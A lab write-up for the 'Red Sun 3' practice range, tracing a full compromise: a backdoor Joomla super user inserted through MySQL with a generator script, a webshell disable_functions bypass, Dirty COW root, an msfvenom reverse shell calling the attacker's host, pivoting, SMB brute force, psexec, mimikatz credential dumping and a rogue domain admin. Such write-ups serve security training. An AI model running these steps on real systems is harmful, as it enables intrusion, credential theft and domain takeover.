Red Sun range 3 (红日靶机三)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-8b58b8de1f26bc7f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-90f93f786401fc6d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-34c62969b9e8d286.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-eb2f9707f69fe41e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5741ec1357744d09.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-62012cc49fa91736.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e6c382841dda86df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Credentials recovered: testuser / cvcvgjASD!@
![](https://upload-images.jianshu.io/upload_images/4664072-8a11ec9bd0ccd98e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-88eeae45c2ba43a4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Brute force failed.
![](https://upload-images.jianshu.io/upload_images/4664072-05f72340a2387dfd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Database login succeeded.
![](https://upload-images.jianshu.io/upload_images/4664072-a45efd4b547948fd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-f311547b69f55312.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ba8285fc559502b1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Joomla CMS: checking the detected version against public vulnerabilities.
![](https://upload-images.jianshu.io/upload_images/4664072-d9615df00a60e2b8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a687b305cface44e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Connect to MySQL with the recovered credentials and add a Super User directly in the database. The hash below is the one from Joomla's own documentation and corresponds to the password "secret"; group_id 8 is the default "Super Users" group, and the table prefix am2zu_ is the one this installation uses:
mysql -uroot -p123 -h 192.168.1.110
INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');
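The hash pasted above is public, so anyone who later reads the users table knows that admin2 logs in with "secret". The following is an added example (not code from the original post or from Joomla) that re-implements Joomla's legacy password format, md5(password + salt) followed by ":" and the salt, verifies that the documented hash really is "secret", and produces the same two INSERT statements with a fresh random salt and a password of your choosing. Joomla 3.x still accepts this legacy format at login and upgrades it to bcrypt afterwards. The prefix am2zu_ and the username admin2 come from the post; the function names are this example's own.

```python
"""Joomla legacy (md5:salt) super-user row generator and verifier.

Added example, not part of the original post or of Joomla itself.
Assumptions: Joomla's legacy hash format is md5(password . salt) ":" salt,
and group id 8 is the default Super Users group.
"""
import hashlib
import re
import secrets
import string

# Hash/salt pair from Joomla's documentation (the one used on the page); password "secret".
DOC_HASH = "d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199"

SUPER_USERS_GROUP = 8  # Joomla default id of the "Super Users" group

_PREFIX_RE = re.compile(r"^[a-z0-9_]+$")          # table prefix such as am2zu_
_USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,50}$")  # keeps the SQL literal quote-free


def joomla_legacy_hash(password: str, salt: str) -> str:
    """Return the stored form: hex md5(password + salt), ':' and the salt."""
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def joomla_legacy_verify(password: str, stored: str) -> bool:
    """Check a candidate password against a stored legacy md5:salt value."""
    digest, _, salt = stored.partition(":")
    if not salt or len(digest) != 32:
        return False
    expected = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return secrets.compare_digest(expected, digest)


def new_salt(length: int = 32) -> str:
    """Fresh alphanumeric salt, same alphabet and length Joomla uses."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def super_user_inserts(prefix: str, username: str, password: str,
                       salt: str = "", name: str = "Administrator2") -> list:
    """Build the two INSERT statements (users row, then group mapping).

    The username and prefix are validated instead of escaped so the generated
    SQL never contains a quote character inside a value.
    """
    if not _PREFIX_RE.match(prefix):
        raise ValueError("table prefix must be lowercase alphanumerics/underscore")
    if not _USERNAME_RE.match(username) or not _USERNAME_RE.match(name.replace(" ", "")):
        raise ValueError("username/name contains characters that would need escaping")
    stored = joomla_legacy_hash(password, salt or new_salt())
    users = (
        f"INSERT INTO `{prefix}users` (`name`, `username`, `password`, `params`, "
        f"`registerDate`, `lastvisitDate`, `lastResetTime`) VALUES "
        f"('{name}', '{username}', '{stored}', '', NOW(), NOW(), NOW());"
    )
    mapping = (
        f"INSERT INTO `{prefix}user_usergroup_map` (`user_id`, `group_id`) "
        f"VALUES (LAST_INSERT_ID(), '{SUPER_USERS_GROUP}');"
    )
    return [users, mapping]


if __name__ == "__main__":
    print("documented hash is 'secret':", joomla_legacy_verify("secret", DOC_HASH))
    # A per-engagement password and salt instead of the well-known pair.
    for stmt in super_user_inserts("am2zu_", "admin2", "Use-Your-Own-Pass-123"):
        print(stmt)
```

Paste the two printed statements into the same mysql session as above; the password you chose is then the only thing that logs admin2 in, rather than a value anyone can look up.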
![](https://upload-images.jianshu.io/upload_images/4664072-b80c61d5818cf981.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7894704650698991.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Credentials: admin2 / secret
Login succeeded.
![](https://upload-images.jianshu.io/upload_images/4664072-66de266e14051082.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-1aa5aa0b8afe817d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-59ef28a74a16b257.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d850824fe9c9e2bb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6f4dcdc91a7eedf9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
disable_functions is set in php.ini, so system/exec/shell_exec/passthru/popen/proc_open are blocked and the webshell cannot run commands directly.
![](https://upload-images.jianshu.io/upload_images/4664072-68d7234fbb77caa6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6642ef65123b2a1f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Bypass via LD_PRELOAD: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
The PHP side uses putenv() to point LD_PRELOAD at an uploaded shared object and then calls mail(); the sendmail child that mail() forks inherits the environment, loads the .so, and the .so's constructor runs the requested command, writing its output to a file the script reads back. This only works when putenv and mail are not themselves disabled and a sendmail binary exists on the host.
Upload bypass_disablefunc.php and bypass_disablefunc_x64.so into templates/beez3/ (the path used in the URLs below).
![](https://upload-images.jianshu.io/upload_images/4664072-6d915fdad40c6407.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Run commands through it (cmd is the command, outpath the file the output is written to, sopath the absolute path of the uploaded .so on the server):
http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
![](https://upload-images.jianshu.io/upload_images/4664072-62cd7fe00fe14856.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
![](https://upload-images.jianshu.io/upload_images/4664072-79b0ac72132ed0d6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-64249971994ea30b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3381f2729d4495a2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
A note found on the host (screenshot above) contains the commands used to create a local user, which leaks SSH credentials wwwuser / wwwuser_123Aqx:
adduser wwwuser
passwd wwwuser_123Aqx
Remote login over SSH as wwwuser.
![](https://upload-images.jianshu.io/upload_images/4664072-26d5f171be4e0445.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Upload linux-exploit-suggester.sh to the host (chmod +x would be enough; 777 is what was typed).
![](https://upload-images.jianshu.io/upload_images/4664072-297e8532a419739d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
[wwwuser@localhost tmp]$ chmod 777 linux-exploit-suggester.sh
[wwwuser@localhost tmp]$ ./linux-exploit-suggester.sh
![](https://upload-images.jianshu.io/upload_images/4664072-f1df3e1ece39abea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Pick an exploit matching the reported kernel version: Dirty COW (CVE-2016-5195), Exploit-DB 40839. Download it locally and upload it to the host.
![](https://upload-images.jianshu.io/upload_images/4664072-8bb938a212aedb45.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
gcc -pthread 40839.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ chmod +x dirty
[wwwuser@localhost tmp]$ rm -f /tmp/passwd.bak
[wwwuser@localhost tmp]$ ./dirty 123.com
![](https://upload-images.jianshu.io/upload_images/4664072-d990b3e48dcafbb4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
40839 copies /etc/passwd to /tmp/passwd.bak and then races the kernel to overwrite the root entry with a uid 0 user named firefart whose password is the argument given (123.com here). su does not accept the password on the command line; run `su firefart` and enter 123.com at the prompt. Only after obtaining the root shell restore the original file, since the restore both needs root and removes the firefart entry:
[wwwuser@localhost tmp]$ su firefart
[firefart@localhost tmp]# mv /tmp/passwd.bak /etc/passwd
The race can leave the kernel unstable; on anything other than a lab box, back up /etc/passwd yourself first and expect to reboot.
Generate a reverse shell payload (192.168.1.128 is the attacker's machine), upload it and run it from the root shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.128 lport=441 -f elf > 1.elf
![](https://upload-images.jianshu.io/upload_images/4664072-1fbc1cf545c64bd7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 441
msf5 exploit(multi/handler) > run
![](https://upload-images.jianshu.io/upload_images/4664072-07b8a3729cf99adb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The ifconfig output showed a second interface on 192.168.93.x. Add a route to that internal network through the meterpreter session, then list the routes:
run autoroute -s 192.168.93.0/24
run autoroute -p
![](https://upload-images.jianshu.io/upload_images/4664072-0e24da2b853eb5c3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Host discovery on the internal network:
use auxiliary/scanner/discovery/arp_sweep
set rhosts 192.168.93.1/24
set threads 10
run
![](https://upload-images.jianshu.io/upload_images/4664072-ed98e510737c07ab.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.1/24
msf5 auxiliary(scanner/smb/smb_version) > run
![](https://upload-images.jianshu.io/upload_images/4664072-ae25a2072547886e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-adc1e8f9b0f9da27.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Password brute force against SMB (auxiliary/scanner/smb/smb_login):
![](https://upload-images.jianshu.io/upload_images/4664072-7e0cffebe10232e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ce658e59b4b11ff5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Log into 192.168.93.20 with psexec. A bind payload is used because the internal host cannot reach the attacker's machine directly; Metasploit connects to the bind port through the autoroute pivot:
msf5 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec) > set rhost 192.168.93.20
rhost => 192.168.93.20
msf5 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD
smbpass => 123qwe!ASD
msf5 exploit(windows/smb/psexec) > run
![](https://upload-images.jianshu.io/upload_images/4664072-08fbaa33021fce2d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7de88a5ad4674b04.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
View processes (ps).
![](https://upload-images.jianshu.io/upload_images/4664072-d5ab085f7b52f799.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Migrate to a more stable process:
getpid
run post/windows/manage/migrate
![](https://upload-images.jianshu.io/upload_images/4664072-8b9daf619351440a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
sysinfo shows the target's system information.
![](https://upload-images.jianshu.io/upload_images/4664072-7242351e0a4a1e3a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
route shows the full network configuration.
![](https://upload-images.jianshu.io/upload_images/4664072-8b093612940f1ae0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
run post/windows/manage/killav attempts to kill known antivirus processes (noisy; lab use only).
run post/windows/gather/enum_logged_on_users lists the users currently logged on to the target.
![](https://upload-images.jianshu.io/upload_images/4664072-75169cae6501cf39.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
run post/windows/gather/enum_applications lists the applications installed on the system.
![](https://upload-images.jianshu.io/upload_images/4664072-7776ef2702c8df50.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
run post/windows/gather/credentials/windows_autologin reads the Winlogon registry keys and returns the auto-logon username and password if one is configured (the original omitted the post/ prefix in the module path).
![](https://upload-images.jianshu.io/upload_images/4664072-403c96bed73ab8b2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Dump credentials from LSASS. The mimikatz extension is deprecated in newer Metasploit releases; `load kiwi` followed by `creds_all` is the replacement and gives the same output:
load mimikatz
kerberos
msv
![](https://upload-images.jianshu.io/upload_images/4664072-f5042795ea773fd7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
use incognito                                   # help incognito shows the available commands
list_tokens -u                                  # list the user tokens available in this session
impersonate_token 'NT AUTHORITY\SYSTEM'         # impersonate the SYSTEM token
impersonate_token NT\ AUTHORITY\\SYSTEM         # same without quotes: escape the space and double the backslash
execute -f cmd.exe -i -t                        # -t runs the process with the impersonated token
shell                                           # or just open a shell directly
rev2self                                        # return to the original token
![](https://upload-images.jianshu.io/upload_images/4664072-2e5009b4d805a200.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
TEST\administrator, a domain administrator account, has a token on this host.
![](https://upload-images.jianshu.io/upload_images/4664072-9b4c465640775837.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Add a domain account. incognito's add_user and add_group_user with -h run against the domain controller (192.168.93.10) using the session's current token, so they only succeed while a Domain Admin token is in use:
meterpreter > rev2self
meterpreter > add_user bing 1234.com -h 192.168.93.10
meterpreter > add_group_user "Domain Admins" bing -h 192.168.93.10
![](https://upload-images.jianshu.io/upload_images/4664072-7961501a99df3f61.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Verify the new account from the .20 shell by opening an IPC$ connection to the DC and listing its C$ share:
net use \\192.168.93.10\ipc$ 1234.com /user:TEST\bing
dir \\192.168.93.10\c$
![](https://upload-images.jianshu.io/upload_images/4664072-abaac8ac35959615.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-19948213270194fd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
References
http://yugod.xmutsec.com/index.php/2020/07/23/90.html
https://www.cnblogs.com/Yang34/p/11407274.html
https://www.jianshu.com/p/dc7f42ef056f
https://xz.aliyun.com/t/2536
https://www.jianshu.com/p/df72d1ee1e3e